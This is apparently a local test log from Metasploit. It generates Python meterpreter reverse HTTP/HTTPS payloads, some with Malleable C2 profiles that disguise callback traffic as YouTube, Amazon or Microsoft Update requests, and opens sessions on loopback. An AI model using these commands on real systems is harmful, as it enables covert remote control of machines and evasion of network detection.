msf payload(python/meterpreter_reverse_http) > C[*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u5kget2o) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u5kget2o) Redirecting stageless: URI '/us/ky/louisville/312-s-fourth-st.html' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID 4qacCRm3env64u_2kMkiQwT6krD2NxNBZEzuggZm9dpigbZ-QhbBLx-c78LzXwmZQ3DAPCltJ3YcydTsbxzfqrZGLNOT-IEijSLcKnnkbX3tu-Hu61rMxV8tu6z1s
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u5kget2o) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u5kget2o) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: u5kget2o) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:38136) at 2026-06-12 12:00:03 +0200
resource ~/Desktop/msf_scripts/python_http_stag
msf payload(python/meterpreter_reverse_http) > sessions  -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

Youtube

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/youtube_video.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/youtube_video.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30608 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242

msf payload(python/meterpreter_reverse_http) > sessions -1
[-] Invalid session identifier: -1
msf payload(python/meterpreter_reverse_http) > 
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2ok3qhmf) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2ok3qhmf) Redirecting stageless: URI '/watch' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID pcg-pRmGgeHRDMQYuycIAwaXhZ0woZLhopjZP
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2ok3qhmf) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2ok3qhmf) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2ok3qhmf) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:38814) at 2026-06-12 12:01:57 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysifno
[-] Unknown command: sysifno. Did you mean sysinfo? Run the help command for more details.
meterpreter > sysinf
[-] Unknown command: sysinf. Did you mean sysinfo? Run the help command for more details.
meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

Zoom

broken

Stagged

msf payload(python/meterpreter/reverse_http) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf payload(python/meterpreter/reverse_http) > set lport 4242
lport => 4242
msf payload(python/meterpreter/reverse_http) > generate -f raw -o /tmp/msf.py
[*] Writing 552 bytes to /tmp/msf.py...
msf payload(python/meterpreter/reverse_http) > to_handler
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter/reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: xvri89tf) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: xvri89tf) Staging python payload (30132 bytes) ...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: xvri89tf) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:34392) at 2026-06-15 10:08:30 +0200

msf payload(python/meterpreter/reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

https

stageless

msf > use payload/python/meterpreter/reverse_https 
msf payload(python/meterpreter/reverse_https) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf payload(python/meterpreter/reverse_https) > set lport 4242
lport => 4242
msf payload(python/meterpreter/reverse_https) > generate -f raw -o /tmp/msf.py
[*] Writing 736 bytes to /tmp/msf.py...
msf payload(python/meterpreter/reverse_https) > to_handler
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter/reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242

msf payload(python/meterpreter/reverse_https) > 
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: rg90hopf) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: rg90hopf) Staging python payload (30104 bytes) ...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: rg90hopf) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:36898) at 2026-06-15 10:10:46 +0200

msf payload(python/meterpreter/reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

amazon.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/amazon.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/amazon.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30752 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: efdsilth) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: efdsilth) Redirecting stageless: URI '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' with UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -> UUID nNdwDJ7Vbjp_VmpCFXnKNAqxud2zlQfvfqr98QsctGmI0-s3oc6-SsUj6m
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: efdsilth) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: efdsilth) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: efdsilth) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:49640) at 2026-06-15 10:18:43 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

bing_maps.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/bing_maps.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/bing_maps.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30672 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: g8tprw0z) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: g8tprw0z) Redirecting stageless: URI '/maps/overlaybfpr' with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' -> UUID Jg_wOB1Eq7kF8BDkb9-wQwwhdjozSunXe4WbQiJnc
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: g8tprw0z) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: g8tprw0z) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: g8tprw0z) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:33648) at 2026-06-15 10:20:05 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

bingsearch_getonly.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/bingsearch_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/bingsearch_getonly.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30792 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5r9him6) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5r9him6) Redirecting stageless: URI '/search/' with UA 'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko' -> UUID s520Tr0Ksw5_E2oHFTzJGgEGhfzu8PmspF5fd6s7lZj_Exd1BvMf_m-GqvhK_xA9zB8_e1Gg1I_gAoRah
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5r9him6) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5r9him6) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: l5r9him6) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:40700) at 2026-06-15 10:21:31 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

microsoft_update.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/microsoftupdate_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/microsoftupdate_getonly.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30412 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 1tc27bqp) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 1tc27bqp) Redirecting stageless: URI '/c/msdownload/update/others/2016/12/29136388_/T0xiRjVMVWxwWUdZTTQwbjhod3VWUTNRbDYyVnE.cab' with UA 'Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40' -> UUID OLbF5LUlpYGYM40n8hwusw890RASX
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 1tc27bqp) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 1tc27bqp) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 1tc27bqp) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:44730) at 2026-06-15 10:23:29 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
gComputer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

mscrl.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/mscrl.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/mscrl.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30668 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: x2iuvyrt) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: x2iuvyrt) Redirecting stageless: URI '/pki/mscorp/cps/default.htm' with UA 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36' -> UUID Ze2q-ItZPhiyJ6cz2AgE6QnDeyYNOrAhsI--44
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: x2iuvyrt) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: x2iuvyrt) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: x2iuvyrt) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used

msf payload(python/meterpreter_reverse_https) > s[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:37008) at 2026-06-15 10:24:48 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

msnbcvideo_getonly.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/msnbcvideo_getonly.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/msnbcvideo_getonly.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30800 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ah0ikp1c) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ah0ikp1c) Redirecting stageless: URI '/z/msnbc2_live01@9615/manifest.f4m' with UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -> UUID 6lzFg3W8dXgm9jPiTNmR5AQsFr0JLT4zVafp8lrZZUZyFv2c
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ah0ikp1c) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ah0ikp1c) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: ah0ikp1c) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:35468) at 2026-06-15 10:25:56 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1`
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

office365_calendar.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/office365_calendar.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/office365_calendar.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30656 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242

msf payload(python/meterpreter_reverse_https) > 
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2xmtlzoy) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2xmtlzoy) Redirecting stageless: URI '/owa/' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID vYTH0wZGyapDu1avKZT02wiHmEKOFaTsOvkhEpSidcdZ2-lEYFppPJXg0N-RDFn21g2TVKphgR4f4sumjewyPfHPyXGwBOwolrf
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2xmtlzoy) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2xmtlzoy) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2xmtlzoy) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:37384) at 2026-06-15 10:27:14 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

oscp.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/oscp.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/oscp.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30180 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_https) > [*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: cn7i8m9e) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: cn7i8m9e) Redirecting stageless: URI '/oscp/rz1Jc0GBIkfyGOcMmDdFlQ9bl7-8H' with UA 'Microsoft-CryptoAPI/6.1' -> UUID rz1Jc0GBIkfyGOcMmDdFhATYcDJTgMNGNL78kDwkvIbwZ0iNb2ntVhLWCYsXWyIEBGC_dEDeERHYpOqXGiCENhAX2D7efdfiFak7
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: cn7i8m9e) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: cn7i8m9e) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: cn7i8m9e) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:38140) at 2026-06-15 10:28:14 +0200

msf payload(python/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

reddit.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_https
